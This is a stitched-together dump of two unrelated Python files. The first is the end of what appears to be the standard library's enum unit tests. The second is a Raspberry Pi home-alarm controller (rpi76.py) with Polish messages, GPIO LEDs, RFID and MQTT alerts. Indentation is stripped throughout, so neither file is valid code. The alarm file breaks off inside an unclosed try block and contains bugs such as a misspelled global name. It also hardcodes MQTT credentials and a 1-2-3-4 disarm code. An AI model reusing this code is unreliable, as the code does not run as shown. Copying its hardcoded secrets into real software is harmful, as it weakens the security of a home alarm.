Perm = Flag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = Flag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_pickle(self):
if isinstance(FlagStooges, Exception):
raise FlagStooges
test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
test_pickle_dump_load(self.assertIs, FlagStooges)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
with self.assertWarns(DeprecationWarning):
self.assertFalse('BLACK' in Color)
with self.assertWarns(DeprecationWarning):
self.assertFalse('RO' in Open)
with self.assertWarns(DeprecationWarning):
self.assertFalse(1 in Color)
with self.assertWarns(DeprecationWarning):
self.assertFalse(1 in Open)
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
def test_auto_number(self):
class Color(Flag):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 4)
def test_auto_number_garbage(self):
with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
class Color(Flag):
red = 'not an int'
blue = auto()
def test_cascading_failure(self):
class Bizarre(Flag):
c = 3
d = 4
f = 6
# Bizarre.c | Bizarre.d
self.assertRaisesRegex(ValueError, "5 is not a valid Bizarre", Bizarre, 5)
self.assertRaisesRegex(ValueError, "5 is not a valid Bizarre", Bizarre, 5)
self.assertRaisesRegex(ValueError, "2 is not a valid Bizarre", Bizarre, 2)
self.assertRaisesRegex(ValueError, "2 is not a valid Bizarre", Bizarre, 2)
self.assertRaisesRegex(ValueError, "1 is not a valid Bizarre", Bizarre, 1)
self.assertRaisesRegex(ValueError, "1 is not a valid Bizarre", Bizarre, 1)
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_bizarre(self):
class Bizarre(Flag):
b = 3
c = 4
d = 6
self.assertEqual(repr(Bizarre(7)), '<Bizarre.d|c|b: 7>')
@support.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(Flag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with support.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
X = 1 << 0
W = 1 << 1
R = 1 << 2
class Color(IntFlag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
def test_type(self):
Perm = self.Perm
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm.R | 8), 'Perm.8|R')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(Perm(8)), 'Perm.8')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.-8')
self.assertEqual(str(~(Perm.R | 8)), 'Perm.W|X')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
self.assertEqual(str(Perm(~8)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(Open(4)), 'Open.4')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC|RW|WO')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(str(Open(~4)), 'Open.CE|AC|RW|WO')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm.R | 8), '<Perm.8|R: 12>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(8)), '<Perm.8: 8>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: -5>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: -3>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: -2>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: -7>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.-8: -8>')
self.assertEqual(repr(~(Perm.R | 8)), '<Perm.W|X: -13>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: -1>')
self.assertEqual(repr(Perm(~8)), '<Perm.R|W|X: -9>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(Open(4)), '<Open.4: 4>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: -1>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: -2>')
self.assertEqual(repr(~Open.AC), '<Open.CE: -4>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC|RW|WO: -524289>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: -524290>')
self.assertEqual(repr(Open(~4)), '<Open.CE|AC|RW|WO: -5>')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i | j, i.value | j.value)
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for j in range(8):
self.assertEqual(i | j, i.value | j)
self.assertEqual((i | j).value, i.value | j)
self.assertIs(type(i | j), Perm)
self.assertEqual(j | i, j | i.value)
self.assertEqual((j | i).value, j | i.value)
self.assertIs(type(j | i), Perm)
for i in Perm:
self.assertIs(i | i, i)
self.assertIs(i | 0, i)
self.assertIs(0 | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
for j in range(8):
self.assertEqual(i & j, i.value & j)
self.assertEqual((i & j).value, i.value & j)
self.assertIs(type(i & j), Perm)
self.assertEqual(j & i, j & i.value)
self.assertEqual((j & i).value, j & i.value)
self.assertIs(type(j & i), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & 7, i)
self.assertIs(7 & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i ^ j, i.value ^ j.value)
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for j in range(8):
self.assertEqual(i ^ j, i.value ^ j)
self.assertEqual((i ^ j).value, i.value ^ j)
self.assertIs(type(i ^ j), Perm)
self.assertEqual(j ^ i, j ^ i.value)
self.assertEqual((j ^ i).value, j ^ i.value)
self.assertIs(type(j ^ i), Perm)
for i in Perm:
self.assertIs(i ^ 0, i)
self.assertIs(0 ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertEqual(~i, ~i.value)
self.assertEqual((~i).value, ~i.value)
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_programatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_programatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_contains(self):
Color = self.Color
Open = self.Open
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertFalse(Color.GREEN in Open)
self.assertFalse(Open.RW in Color)
with self.assertWarns(DeprecationWarning):
self.assertFalse('GREEN' in Color)
with self.assertWarns(DeprecationWarning):
self.assertFalse('RW' in Open)
with self.assertWarns(DeprecationWarning):
self.assertFalse(2 in Color)
with self.assertWarns(DeprecationWarning):
self.assertFalse(2 in Open)
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
with self.assertWarns(DeprecationWarning):
self.assertFalse('swallow' in RW)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
@support.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(IntFlag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with support.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestUnique(unittest.TestCase):
def test_unique_clean(self):
@unique
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
@unique
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@unique
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@unique
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@unique
class Silly(Enum):
one = 1
two = 'dos'
name = 3
@unique
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumMeta:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumMeta:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
maxDiff = None
class Color(Enum):
red = 1
green = 2
blue = 3
def test_pydoc(self):
# indirectly test __objclass__
if StrEnum.__doc__ is None:
expected_text = expected_help_output_without_docs % __name__
else:
expected_text = expected_help_output_with_docs % __name__
output = StringIO()
helper = pydoc.Helper(output=output)
helper(self.Color)
result = output.getvalue().strip()
self.assertEqual(result, expected_text)
def test_inspect_getmembers(self):
values = dict((
('__class__', EnumMeta),
('__doc__', 'An enumeration.'),
('__members__', self.Color.__members__),
('__module__', __name__),
('blue', self.Color.blue),
('green', self.Color.green),
('name', Enum.__dict__['name']),
('red', self.Color.red),
('value', Enum.__dict__['value']),
))
result = dict(inspect.getmembers(self.Color))
self.assertEqual(values.keys(), result.keys())
failed = False
for k in values.keys():
if result[k] != values[k]:
print()
print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
('=' * 75, k, result[k], values[k], '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_inspect_classify_class_attrs(self):
# indirectly test __objclass__
from inspect import Attribute
values = [
Attribute(name='__class__', kind='data',
defining_class=object, object=EnumMeta),
Attribute(name='__doc__', kind='data',
defining_class=self.Color, object='An enumeration.'),
Attribute(name='__members__', kind='property',
defining_class=EnumMeta, object=EnumMeta.__members__),
Attribute(name='__module__', kind='data',
defining_class=self.Color, object=__name__),
Attribute(name='blue', kind='data',
defining_class=self.Color, object=self.Color.blue),
Attribute(name='green', kind='data',
defining_class=self.Color, object=self.Color.green),
Attribute(name='red', kind='data',
defining_class=self.Color, object=self.Color.red),
Attribute(name='name', kind='data',
defining_class=Enum, object=Enum.__dict__['name']),
Attribute(name='value', kind='data',
defining_class=Enum, object=Enum.__dict__['value']),
]
values.sort(key=lambda item: item.name)
result = list(inspect.classify_class_attrs(self.Color))
result.sort(key=lambda item: item.name)
failed = False
for v, r in zip(values, result):
if r != v:
print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, enum)
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5 # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
class TestIntEnumConvert(unittest.TestCase):
def test_convert_value_lookup_priority(self):
test_type = enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# We don't want the reverse lookup value to vary when there are
# multiple possible names for a given value. It should always
# report the first lexigraphical name in that case.
self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
def test_convert(self):
test_type = enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_TEST_NAME_F,
test_type.CONVERT_TEST_NAME_A)
self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_TEST_* found.')
if __name__ == '__main__':
unittest.main()
|
rpi76.py
|
# importing libraries
import paho.mqtt.client as mqtt
from PyQt5.QtWidgets import *
from PyQt5 import QtCore, QtGui
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import sys
import time
import threading
import RPi.GPIO as GPIO
try:
GPIO.setmode(GPIO.BCM)
GPIO.setup(23, GPIO.IN) # RFID
GPIO.setup(24, GPIO.OUT)
GPIO.setup(25, GPIO.OUT)
GPIO.setup(8, GPIO.OUT)
GPIO.setup(7, GPIO.OUT)
GPIO.setup(1, GPIO.OUT)
GPIO.output(24, GPIO.LOW) # CZERWONA
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
GPIO.output(1, GPIO.LOW) # GREEN
RFID_flag = 0
Alarm = 0
armed = 0;
password = [1, 2, 3, 4]
code = []
txt = ''
MoveAlarm = 0
WaterAlarm = 0
FireAlarm = 0
FridgeAlarm = 0
problem = 0
# Bool, który decyduje, czy wysyłane są komunikaty po MQTT
MQTT_publish = True
def on_message(client, userdata, message):
global MoveAlarm, WaterAlarm, FireAlarm
if message.topic == "BHL/MoveDetected/Alarm":
MoveAlarm = 1
if message.topic == "BHL/FireAlarm/Alarm":
FireAlarm = 1
if message.topic == "BHL/WaterAlarm/Alarm":
WaterAlarm = 1
broker_address = "192.168.1.200"
client = mqtt.Client("Control_Interface")
client.username_pw_set("Raspberry_Pi", "Rpi_Raspberry_Python")
client.on_message = on_message
client.connect(broker_address, 1883)
client.loop_start()
client.subscribe([("BHL/MoveAlarm/Alarm", 1), ("BHL/FireAlarm/Alarm", 1), ("BHL/WaterAlarm/Alarm", 1),
("BHL/MoveDetected/Alarm", 1)])
def RFID_callback(channel):
global RFID_flag
RFID_flag = 1
GPIO.add_event_detect(23, GPIO.FALLING, callback=RFID_callback, bouncetime=200)
class AThread(QThread):
def run(self):
global armed, MoveAlarm, WaterAlarm, FireAlarm, Alarm, problem, RFID_flag
while True:
if RFID_flag == 1:
RFID_flag = 0
if armed == 1:
window.rfid()
elif armed == 0:
arm_alarm()
if armed == 1 and MoveAlarm == 1 and Alarm == 0:
window.label.setStyleSheet("color: rgb(0, 0, 0);")
problem = 1
for t in range(5, -1, -1):
if RFID_flag == 1 or armed == 0:
problem = 0
break
if t == 0:
window.label.setStyleSheet("color: rgb(255, 0, 0);")
window.label.setText('ALARM'.format(t))
Alarm = 1
problem = 0
GPIO.output(24, GPIO.HIGH) # CZERWONA
GPIO.output(25, GPIO.HIGH) # YELLOW UPPER
GPIO.output(8, GPIO.HIGH) # YELLOW MIDDLE
GPIO.output(7, GPIO.HIGH) # YELLOW BOTTOM
GPIO.output(1, GPIO.HIGH) # GREEN
if MQTT_publish == True:
client.publish("BHL/MoveAlarm/Alarm", "1")
break
if txt == '':
window.label.setText('Aktywacja alarmu za {}s'.format(t))
time.sleep(1)
if WaterAlarm == 1:
GPIO.output(24, GPIO.LOW) # CZERWONA
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
GPIO.output(1, GPIO.LOW) # GREEN
armed = 1
while WaterAlarm:
if len(code) == 0:
GPIO.output(1, GPIO.LOW)
window.label.setStyleSheet("color: rgb(0, 0, 255);")
window.label.setText('UWAGA ZALANIE!')
time.sleep(1)
GPIO.output(7, GPIO.HIGH) # YELLOW BOTTOM
time.sleep(1)
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
if armed == 0:
window.label.setStyleSheet("color: rgb(0, 255, 0);")
window.label.setText('Alarm rozbrojony')
GPIO.output(24, GPIO.LOW) # CZERWONA
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
GPIO.output(1, GPIO.HIGH) # GREEN
if RFID_flag == 1:
WaterAlarm = 0
if FireAlarm == 1:
GPIO.output(24, GPIO.LOW) # CZERWONA
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
GPIO.output(1, GPIO.LOW) # GREEN
armed = 1
while FireAlarm == 1:
if len(code) == 0:
GPIO.output(1, GPIO.LOW) # GREEN
window.label.setStyleSheet("color: rgb(255, 0, 0);")
window.label.setText('UWAGA POZAR!')
time.sleep(1)
GPIO.output(8, GPIO.HIGH) # YELLOW MIDDLE
time.sleep(1)
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
if armed == 0:
window.label.setStyleSheet("color: rgb(0, 255, 0);")
window.label.setText('Alarm rozbrojony')
GPIO.output(24, GPIO.LOW) # CZERWONA
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
GPIO.output(1, GPIO.HIGH) # GREEN
if RFID_flag == 1:
FireAlarm = 0
def clear_flags():
global MoveAlarm, WaterAlarm, FireAlarm, Alarm, RFID_Flag
problem = 0
Alarm = 0
MoveAlarm = 0
WaterAlarm = 0
FireAlarm = 0
RFID_flag = 0
GPIO.output(24, GPIO.LOW) # CZERWONA
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
GPIO.output(1, GPIO.LOW) # GREEN
if MQTT_publish == True:
client.publish("BHL/StopAlarm", "1")
def arm_alarm():
global code, txt, armed, RFID_flag
window.label.setStyleSheet("color: rgb(255, 0, 0);")
for t in range(6, -2, -2):
if RFID_flag == 1:
window.label.setStyleSheet("color: rgb(0, 255, 0);")
window.label.setText('Przerwano uzbrajanie alarmu')
time.sleep(2)
break
if t < 20:
window.label.setText('Uzbrajanie alarmu {}s'.format(t + 1))
GPIO.output(25, GPIO.HIGH)
time.sleep(1)
window.label.setText('Uzbrajanie alarmu {}s'.format(t))
GPIO.output(25, GPIO.LOW)
time.sleep(1)
clear_flags()
GPIO.output(25, GPIO.LOW)
if RFID_flag == 1:
RFID_flag = 0
armed = 0
clean_label()
else:
window.label.setText('Alarm uzbrojony')
GPIO.output(24, GPIO.HIGH)
GPIO.output(25, GPIO.LOW)
GPIO.output(8, GPIO.LOW)
GPIO.output(7, GPIO.LOW)
GPIO.output(1, GPIO.LOW)
armed = 1
def clean_delay():
global txt, code
if problem == 0 and Alarm == 1:
time.sleep(1)
window.label.setStyleSheet("color: rgb(255, 0, 0);")
window.label.setText('ALARM')
